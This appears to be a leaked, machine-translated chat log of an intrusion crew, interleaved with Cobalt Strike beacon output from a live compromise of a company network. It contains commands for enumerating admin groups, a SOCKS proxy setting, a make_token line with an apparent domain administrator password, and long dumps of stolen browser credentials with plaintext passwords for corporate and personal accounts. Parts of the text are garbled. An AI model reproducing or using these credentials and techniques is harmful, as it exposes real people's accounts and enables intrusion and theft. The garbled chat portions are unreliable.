The ``hosts'' exist? According to the links, yes, but I can't get there + is there virtualization at all?question такойeyJhbGciOiJBFQgtWxVdSoioqX5YErUhcIWJjoVCS8e2VVd3ipHBBbQqnpYJgmIoDjGx8mG9sjMkJv8dbB8pRYcMRFtlgGuabvp7IcFoBSDikbUE6OFR7QbhdjYmKmzQ3Pi+YSzQiJWgXfzrTxiDXvVVD9yLs5HZAMx7kd+H96FWXSHBF4roPEKIu1NsQlI/ikikb5ZXZtb8Bjzu/UJsDFij6CuIv1lAkQ==eyJhbGciOiJBY7xUYEIzqDilLSDdB+KfdMuSF53iWnoIJ/eW2At2J6J6dogVGoAelC0ZeKKc1Ta08ZNVGzSxKtg71IW73duj0lO22fXmrXZ2qSduLXhB2QoSzzbdZRgTfb9O03MOCPs074EWzTy1UmUpD/CdsKmiKPOwFHZmrMWuJ1jyROhhGBPlKiE2HbrUYv5MR51TMndJ5Pqvg8pWc82dCOEzxSu7zvuKqAHjtCtfUtoDRp9pPGc=eyJhbGciOiJBjuc/q4kyD5WW6ouRR0DBmIZtGzrORNQpHRpYafG/QD4O7zW51wMQcDRM2viwOssH/aiP7j381dt+7D13Nu+KyOF8H1AT7zJe6EV2jwzYHx8JceMmY29WMnJc+M1TCUbxKZP3enTXr5k98bzVCQClqdGpfEhZW/XxvSkCNEzPf1mevDsm2QUnBwpUeipayncF5Mtaz0+ITx9xio7pLDjdD+10YbDO0uPw7LeH0RLehwore2XIQj5p7S+LuRZQ3mXreyJhbGciOiJBhJrHddRITrFEAg6bEqm7Agcz7EcoCQFkbbLRLBSEZpeiQB91QdSIyq/wrN1oFlxP4V3gczdgqBL02EuJYOa7rDmX9C59RFkvLGBrj0xae5vXkrAmTyJtdQufDH3C6x1WE1Ybn6zlHa0WAJ0QpyZD2cPAe+VUOo4AdZdnf6cenb3DPBvuIStpeCc6WD0VXLMtKsMbz7F7vLgNUlpcJo3CsZasqW05tZyCuqRcOdiyD3DCeuYOaPNc7zrNbYLy43TLbB our rocket)who's gonna get pussy for taking the initiative?)))) I'm intrigued read the main) tell me) we never get bored I'm in the course of fucking fun situation, kz))))) and who conducted the meeting I do not know ((but did not let me see anything) Target said that the set and some tests are not in the course I have not even seen themtut? you didn't happen to check the tests for new candidates? ok then i'll send them in a separate pack i'm ahtung here again but in a couple of hours i'll be taking my test soon so can you give me yours for pars?+ do not have to duplicate and you can always consult plus I write all sorts of things they fly different information interesting to work in the general channels remind me to give you tomorrow to rocket to online norton and bypass the detector I just did a test so I have no way to parry it i don't think i'm thinking too much now) it's funny how life is so fucked up when no one is thinking about anything it was like this to this day when i used to communicate with the minister i took it from someone else's cobalt long time ago so right i started noticing crooked listener in other people's cobalts
it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager)
if you write ipak from HTtps Host (Stager) - stepping goes "bypassing" SSL certificate which is on the pad - which is FUCKING and adds blocking by phasers all I see
 give me the session pass
takehq.com

No hedgehog
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[+] host called home, sent: 108 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[+] host called home, sent: 101 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[+] host called home, sent: 93 bytes
[+] received output:
The system cannot find the file specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[+] host called home, sent: 83 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is D0FC-5A15

 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019 07:05 AM <DIR> .
08/05/2019 07:05 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,238,346,240 bytes free

``at least give us a sign of life'' (no session) ``c:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History````
 Directory of C:\Users\Djarden\AppData\Local\MicrosoftEdge\User\Default

01/26/2017 10:24 AM <DIR> .
01/26/2017 10:24 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,248,209,408 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019 07:05 AM <DIR> .
08/05/2019 07:05 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,254,611,456 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge

02/03/2017 08:42 AM <DIR> .
02/03/2017 08:42 AM <DIR> .
01/26/2017 09:48 AM <DIR> CortanaAssist
02/03/2017 08:42 AM <DIR> Extensions
01/26/2017 09:46 AM <DIR> PlayReady
01/30/2019 01:13 PM <DIR> UrlBlock
01/26/2017 09:46 AM <DIR> User
               0 File(s) 0 bytes
               7 Dir(s) 24,243,003,392 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default

04/26/2017 09:01 AM <DIR> .
04/26/2017 09:01 AM <DIR> .
04/26/2017 09:01 AM <DIR> BrowserImport
01/15/2021 01:13 PM <DIR> DataStore
01/22/2018 10:23 AM <DIR> DomainSuggestions
01/26/2017 09:46 AM <DIR> Favorites
01/26/2017 09:46 AM <DIR> ImageStore
09/10/2020 03:38 PM <DIR> RACShare
08/28/2017 01:01 PM <DIR> Recovery
               0 File(s) 0 bytes
               9 Dir(s) 24,242,847,744 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History

File Not Found
``Ah, yes, I switched servers
```
setg Proxies socks4:185.150.189.165:43940
`takehq.com give me a passport session i asked to leave for the maila why did you put out the socks?) not a folder there history file should lie hezh? 1 megabyte fftam and chrome `asdvtgr5erqwdf` and go to the ortn try it yourself pick me pliz history file i can not believe that not dumpedda it does not have a fox?I don't know if it's a good idea to get it from her, but I'm not sure if it's a good idea to get it from her, I just don't know if it's a good idea to get it from her.
```
DA
Members

-------------------------------------------------------------------------------
Administrator arobinsona cancelet
kaseyaservice O365Service sagert

The command completed successfully.

```


```
Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
RTP-Admins_Ent
vmbackup
The command completed successfully.


``Error when opening the archive-rezip Symantec Endpoint Protection
Kaspersky Endpoint Security 10 for Windows

And some https://www.kaseya.com

```
DA

Members

-------------------------------------------------------------------------------
Administrator adonixadmin alloyamms
Angel barracuda BarracudaBUP
bbuerck BGW CAncelet
canceleta cevansa citrix_svc
DHaase EntAdmin gahbarracuda
orgbarracuda sagert Services_Backup
Uptime veeam wstangea

```

```
EA

Members

-------------------------------------------------------------------------------
Administrator EntAdmin Services_Backup
Uptime wstangea
The command completed successfully.

```

```
LA richmonddc1
Members

-------------------------------------------------------------------------------
Administrator
adonixadmin
Domain Admins
EntAdmin
Enterprise Admins
sagert
Services_Backup
smonitor
Uptime
The command completed successfully.

``````
[*] Beginning Edge Extraction.

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

[*] Finished Edge extraction.
What's in the hedgehog, if sharpweb is dead, I check the files in gkeller\g$ so what's in the hedgehog?
http://192.168.0.80/
http://192.168.0.11/
http://192.168.0.43/
http://192.168.0.57/
http://192.168.0.47/
http://192.168.0.121:8080/
``Check out chrome, the hedgehog and the hedgehog didn't check out``` so I downloaded the profile of the ff and the browsers from it?
File Not Found

``File Guess What```
 Volume in drive C is Windows
 Volume Serial Number is A6E5-1986

``Do then ``dir C:\users\*.rdg /s`` is not there this password has a session? I also asked to see the rdp there from-guesspolzak and taka and what about the takapolzak from what taka? or sharpChrome?it's from where? i see it's just there, i can't see the password if it's not waterway99! let me try there's a saved password i'll tell you more last time bingo was in the history ffugaday where did bingo know? 49655	https://infosight.hpe.com/app/login HPE InfoSight | Hewlett Packard Enterprise 1 0 13250782013357001watch the admins on the rdp interestingI by the way the web port does not work there
127.0.1.1:3389
127.0.1.1:445
maybe it's true....keep all mail accesses nearby to clean up the alerts if we find nimble accesses by the way i figured it was a redirect to 127.0.0.1 noticed this message long time ago when i was going through the mail using the word nimble so i fucked up my time :` `
beacon> shell ping -a 127.0.1.1
[*] Tasked beacon to run: ping -a 127.0.1.1.
[+] host called home, sent: 48 bytes
[+] received output:

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell nslookup 127.0.1.1
[*] Tasked beacon to run: nslookup 127.0.1.1
[+] host called home, sent: 49 bytes
[+] received output:
*** wwdc2.waterway.com can't find 127.0.1.1: Non-existent domain

Server: wwdc2.waterway.com
Address: 192.168.0.222
and the other 50% is another way is 50%[ ](https://mediaeveryone.com/group/waterway-com?msg=HjARdNfzFS88zuRew) take into account the fact that they mb tupo badly configured it can immediately nslookup[ ](https://mediaeveryone.com/group/waterway-com?msg=8APBAwuecQy7S2Etk) no, it's a chip. last logon write during login) pinging from the network 127.0.1.1 is a service crap for spam mail tact "with itself" is not 127.0.0.so for ssh would be third-party iptipo they go there(?) well ssh isa127.0.1.1.1 there is writing root login from if you mean what I wrote abovein meaning? just smssochki strange-nimbeltam eto gde tam rd port open? tell me on the request for password while i see that they complain "i forgot my password from my kankuntemr((( "and here rakspeyspro nimbly here are samesochki come on the desktop nothing interesting?
```
netstat /p tcp /a | findstr 3389
``anything on the desktop? Look where the rdp opens in the ff, nothing interesting
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```
did you check this e-mail? that's how we haven't found it yet they seem to have a vendor database with this kind of access
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
``````
--- Chromium Credential (User: mapusatera) ---
URL : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123\

[*] Finished Google Chrome extraction.

[*] Beginning Edge Extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42
I'll take a look, while you take off the chrome and explore the car, I see he has a FF thank you
make_token WATERWAY\Administrator 1853Gators
``Give me an admin account for the token
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 8 K NT AUTHORITY\SYSTEM 29:59:15
System 4 Services 0 1,240 K N/A 0:05:27
Secure System 72 Services 0 40,344 K NT AUTHORITY\SYSTEM 0:00:00
Registry 132 Services 0 103,088 K NT AUTHORITY\SYSTEM 0:00:07
smss.exe 520 Services 0 1,136 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 896 Services 0 4,932 K NT AUTHORITY\SYSTEM 0:00:04
wininit.exe 988 Services 0 6,092 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 996 Console 1 3,936 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 816 Services 0 14,728 K NT AUTHORITY\SYSTEM 0:06:11
LsaIso.exe 644 Services 0 2,844 K NT AUTHORITY\SYSTEM 0:00:00
lsass.exe 788 Services 0 28,512 K NT AUTHORITY\SYSTEM 0:00:30
svchost.exe 1136 Services 0 28,364 K NT AUTHORITY\SYSTEM 0:00:05
WUDFHost.exe 1164 Services 0 7,648 K NT AUTHORITY\LOCAL SERVICE 0:00:00
fontdrvhost.exe 1200 Services 0 3,300 K Font Driver Host\UMFD-0 0:00:00
winlogon.exe 1288 Console 1 8,348 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1348 Services 0 17,564 K NT AUTHORITY\NETWORK SERVICE 0:00:20
svchost.exe 1400 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:04
fontdrvhost.exe 1424 Console 1 2,720 K Font Driver Host\UMFD-1 0:00:00
LogonUI.exe 1508 Console 1 51,348 K NT AUTHORITY\SYSTEM 0:00:03
svchost.exe 1612 Services 0 177,256 K NT AUTHORITY\NETWORK SERVICE 0:03:30
svchost.exe 1660 Services 0 7,028 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1668 Services 0 7,484 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1676 Services 0 4,864 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1684 Services 0 10,660 K NT AUTHORITY\LOCAL SERVICE 0:00:00
dwm.exe 1696 Console 1 33,872 K Window Manager\DWM-1 0:00:00
svchost.exe 1704 Services 0 6,136 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1712 Services 0 10,664 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1732 Services 0 5,060 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1920 Services 0 8,768 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1928 Services 0 6,904 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 1936 Services 0 11,164 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 876 Services 0 9,372 K NT AUTHORITY/NETWORK SERVICE 0:00:06
svchost.exe 1480 Services 0 15,148 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2096 Services 0 5,948 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2132 Services 0 6,864 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2168 Services 0 17,260 K NT AUTHORITY\LOCAL SERVICE 0:00:36
svchost.exe 2196 Services 0 8,172 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2208 Services 0 13,320 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2256 Services 0 18,528 K NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2444 Services 0 9,292 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2524 Services 0 10,280 K NT AUTHORITY/NETWORK SERVICE 0:00:03
svchost.exe 2580 Services 0 5,760 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2716 Services 0 7,184 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2728 Services 0 16,268 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2776 Services 0 8,380 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2824 Services 0 24,512 K NT AUTHORITY\SYSTEM 0:02:36
svchost.exe 2892 Services 0 9,584 K NT AUTHORITY\SYSTEM 0:00:00
vmms.exe 3060 Services 0 22,292 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3128 Services 0 6,976 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3156 Services 0 7,048 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3168 Services 0 6,508 K NT AUTHORITY\LOCAL SERVICE 0:00:00
NVDisplay.Container.exe 3276 Services 0 16,440 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 3284 Services 0 10,532 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3296 Services 0 10,420 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3384 Services 0 8,780 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 3480 Services 0 8,792 K NT AUTHORITY\SYSTEM 0:00:33
svchost.exe 3488 Services 0 5,508 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3496 Services 0 7,696 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3664 Services 0 6,560 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3672 Services 0 9,656 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3768 Services 0 9,088 K NT AUTHORITY\SYSTEM 0:00:00
Memory Compression 3776 Services 0 420,412 K NT AUTHORITY\SYSTEM 0:00:24
svchost.exe 3876 Services 0 7,652 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3888 Services 0 7,524 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 3996 Services 0 8,412 K NT AUTHORITY\SYSTEM 0:00:00
dasHost.exe 4300 Services 0 10,316 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4364 Services 0 7,416 K NT AUTHORITY\LOCAL SERVICE 0:00:00
vmcompute.exe 4500 Services 0 6,648 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4520 Services 0 13,532 K NT AUTHORITY\LOCAL SERVICE 0:00:03
svchost.exe 4592 Services 0 5,808 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4600 Services 0 8,532 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4640 Services 0 6,684 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4768 Services 0 12,944 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4812 Services 0 15,420 K NT AUTHORITY\SYSTEM 0:00:09
spoolsv.exe 4864 Services 0 28,180 K NT AUTHORITY\SYSTEM 0:00:01
armsvc.exe 4956 Services 0 5,900 K NT AUTHORITY\SYSTEM 0:00:00
winagent.exe 4972 Services 0 23,628 K NT AUTHORITY\SYSTEM 0:00:16
BASupSrvc.exe 5012 Services 0 22,820 K NT AUTHORITY\SYSTEM 0:00:05
AdobeUpdateService.exe 5032 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
BASupSrvcUpdater.exe 5048 Services 0 15,524 K NT AUTHORITY\SYSTEM 0:00:02
AGMService.exe 5076 Services 0 10,448 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5100 Services 0 8,764 K NT AUTHORITY\SYSTEM 0:00:00
BtwRSupportService.exe 5116 Services 0 6,920 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2308 Services 0 12,940 K NT AUTHORITY\NETWORK SERVICE 0:00:00
CarboniteService.exe 4556 Services 0 130,688 K NT AUTHORITY\SYSTEM 1:30:52
BtSwitcherService.exe 4808 Services 0 6,400 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtService.exe 5128 Services 0 8,532 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtOBEXService.exe 5136 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00
AGSService.exe 5144 Services 0 10,000 K NT AUTHORITY\SYSTEM 0:00:00
officeclicktorun.exe 5168 Services 0 29,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5244 Services 0 34,896 K NT AUTHORITY\SYSTEM 0:00:12
svchost.exe 5252 Services 0 40,360 K NT AUTHORITY\LOCAL SERVICE 0:00:11
EPIntegrationService.exe 5264 Services 0 16,884 K NT AUTHORITY\SYSTEM 0:00:02
EPUpdateService.exe 5344 Services 0 9,172 K NT AUTHORITY\SYSTEM 0:00:02
EPSecurityService.exe 5352 Services 0 405,312 K NT AUTHORITY\SYSTEM 0:04:30
EPProtectedService.exe 5388 Services 0 8,252 K NT AUTHORITY\SYSTEM 0:00:00
bdredline.exe 5404 Services 0 12,116 K NT AUTHORITY\SYSTEM 0:00:00
fbguard.exe 5488 Services 0 6,244 K NT AUTHORITY\SYSTEM 0:00:00
MSOIDSVC.EXE 5636 Services 0 15,232 K NT AUTHORITY\SYSTEM 0:00:00
jhi_service.exe 5720 Services 0 5,964 K NT AUTHORITY\SYSTEM 0:00:00
KiteService.exe 5728 Services 0 29,228 K NT AUTHORITY\SYSTEM 0:00:00
IpOverUsbSvc.exe 5748 Services 0 12,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5760 Services 0 8,816 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5772 Services 0 12,832 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 5780 Services 0 5,412 K NT AUTHORITY\SYSTEM 0:00:00
erlsrv.exe 5792 Services 0 3,472 K NT AUTHORITY\SYSTEM 0:00:00
sqlwriter.exe 5800 Services 0 7,788 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtAudioService.exe 5808 Services 0 7,924 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5828 Services 0 10,188 K NT AUTHORITY\SYSTEM 0:00:00
RedGate.Client.Service.ex 5820 Services 0 56,536 K NT AUTHORITY\SYSTEM 0:00:06
cygrunsrv.exe 5844 Services 0 5,784 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 5856 Services 0 5,800 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5888 Services 0 18,580 K NT AUTHORITY\SYSTEM 0:00:00
agent.exe 5912 Services 0 148,340 K NT AUTHORITY\SYSTEM 0:01:22
svchost.exe 5928 Services 0 5,912 K NT AUTHORITY\LOCAL SERVICE 0:00:00
cygrunsrv.exe 5936 Services 0 5,752 K NT AUTHORITY\SYSTEM 0:00:00
nvcontainer.exe 5952 Services 0 31,552 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6040 Services 0 5,600 K NT AUTHORITY\LOCAL SERVICE 0:00:00
erl.exe 6112 Services 0 23,400 K NT AUTHORITY\SYSTEM 0:03:59
fbserver.exe 6232 Services 0 6,712 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 6248 Services 0 5,312 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6404 Services 0 7,052 K NT AUTHORITY/NETWORK SERVICE 0:00:00
MSOIDSVCM.EXE 6772 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 6880 Services 0 6,880 K NT AUTHORITY\LOCAL SERVICE 0:00:01
cygrunsrv.exe 6968 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 7100 Services 0 7,120 K NT AUTHORITY\SYSTEM 0:00:00
epmd.exe 7284 Services 0 3,492 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7316 Services 0 12,360 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7408 Services 0 6,956 K NT AUTHORITY\NETWORK SERVICE 0:00:00
sqlservr.exe 7656 Services 0 243,216 K NT SERVICE\MSSQLSERVER 0:09:42
unsecapp.exe 7716 Services 0 6,536 K NT AUTHORITY\SYSTEM 0:00:00
sqlceip.exe 7820 Services 0 41,456 K NT SERVICE\SQLTELEMETRY 0:00:02
conhost.exe 8448 Services 0 7,544 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 8516 Services 0 7,384 K NT AUTHORITY\SYSTEM 0:00:00
alprlink.exe 8636 Services 0 17,492 K NT AUTHORITY\SYSTEM 0:00:00
alprd.exe 8704 Services 0 196,332 K NT AUTHORITY\SYSTEM 0:00:08
conhost.exe 8816 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00
beanstalkd.exe 8912 Services 0 5,364 K NT AUTHORITY\SYSTEM 0:00:01
rundll32.exe 8924 Console 1 6,580 K NT AUTHORITY\SYSTEM 0:00:00
NVDisplay.Container.exe 8292 Console 1 37,580 K NT AUTHORITY\SYSTEM 0:00:04
WmiPrvSE.exe 8264 Services 0 54,308 K NT AUTHORITY\SYSTEM 0:00:18
svchost.exe 9464 Services 0 8,284 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 10772 Services 0 15,412 K NT AUTHORITY/NETWORK SERVICE 0:00:05
svchost.exe 10896 Services 0 10,804 K NT AUTHORITY\SYSTEM 0:00:03
NableSixtyFourBitManager.    11368 Services 0 23,952 K NT AUTHORITY\SYSTEM 0:00:41
conhost.exe 11376 Services 0 4,756 K NT AUTHORITY\SYSTEM 0:00:00
NableReactiveManagement.e 11408 Services 0 32,052 K NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 11420 Services 0 4,760 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11636 Services 0 13,736 K NT AUTHORITY\SYSTEM 0:00:00
fdlauncher.exe 11784 Services 0 4,376 K NT SERVICE\MSSQLFDLauncher 0:00:00
Launchpad.exe 11792 Services 0 16,268 K NT SERVICE\MSSQLLaunchpad 0:00:00
fdhost.exe 11868 Services 0 6,328 K NT SERVICE\MSSQLFDLauncher 0:00:00
conhost.exe 11876 Services 0 4,672 K NT SERVICE\MSSQLFDLauncher 0:00:00
win32sysinfo.exe 12240 Services 0 2,348 K NT AUTHORITY\SYSTEM 0:00:00
inet_gethethost.exe 5332 Services 0 4,584 K NT AUTHORITY\SYSTEM 0:00:00
SolarWinds.MSP.CacheServi 13132 Services 0 37,972 K NT AUTHORITY\LOCAL SERVICE 0:00:03
SolarWinds.MSP.RpcServerS 13244 Services 0 48,160 K NT AUTHORITY\SYSTEM 0:00:06
dllhost.exe 12684 Services 0 10,632 K NT AUTHORITY\SYSTEM 0:00:00
fmplugin.exe 9848 Services 0 28,400 K NT AUTHORITY\SYSTEM 0:00:13
conhost.exe 9832 Services 0 7,776 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 1304 RDP-Tcp#2 2 6,464 K NT AUTHORITY\SYSTEM 0:00:16
winlogon.exe 1532 RDP-Tcp#2 2 2 9,268 K NT AUTHORITY\SYSTEM 0:00:00
WUDFHost.exe 2220 Services 0 68,012 K NT AUTHORITY\LOCAL SERVICE 0:03:59
fontdrvhost.exe 2744 RDP-Tcp#2 2 8,708 K Font Driver Host\UMFD-2 0:00:01
dwm.exe 4320 RDP-Tcp#2 2 87,008 K Window Manager\DWM-2 0:01:17
NVDisplay.Container.exe 5576 RDP-Tcp#2 2 2 50,612 K NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 6276 Services 0 7,112 K NT AUTHORITY\SYSTEM 0:00:00
EPConsole.exe 11732 RDP-Tcp#2 2 1,220 K WATERWAY\mapusatera 0:00:03
rdpclip.exe 3540 RDP-Tcp#2 2 11,648 K WATERWAY\mapusatera 0:00:11
nvcontainer.exe 11124 RDP-Tcp#2 2 23,532 K WATERWAY\mapusatera 0:00:02
sihost.exe 4508 RDP-Tcp#2 2 26,852 K WATERWAY\mapusatera 0:00:04
nvcontainer.exe 3140 RDP-Tcp#2 2 38,620 K WATERWAY\mapusatera 0:00:55
svchost.exe 11080 RDP-Tcp#2 2 26,112 K WATERWAY\mapusatera 0:00:44
svchost.exe 5672 RDP-Tcp#2 2 25,728 K WATERWAY\mapusatera 0:00:01
svchost.exe 12848 Services 0 20,636 K NT AUTHORITY\SYSTEM 0:00:01
taskhostw.exe 6836 RDP-Tcp#2 2 21,608 K WATERWAY\mapusatera 0:00:03
svchost.exe 8544 Services 0 7,808 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11900 Services 0 18,716 K NT AUTHORITY\LOCAL SERVICE 0:00:00
ctfmon.exe 1768 RDP-Tcp#2 2 28,616 K WATERWAY\mapusatera 0:00:42
explorer.exe 13472 RDP-Tcp#2 2 175,424 K WATERWAY\mapusatera 0:01:37
NVIDIA Web Helper.exe 13484 RDP-Tcp#2 2 12,100 K WATERWAY\mapusatera 0:00:02
conhost.exe 13556 RDP-Tcp#2 2 2 1,268 K WATERWAY\mapusatera 0:00:00
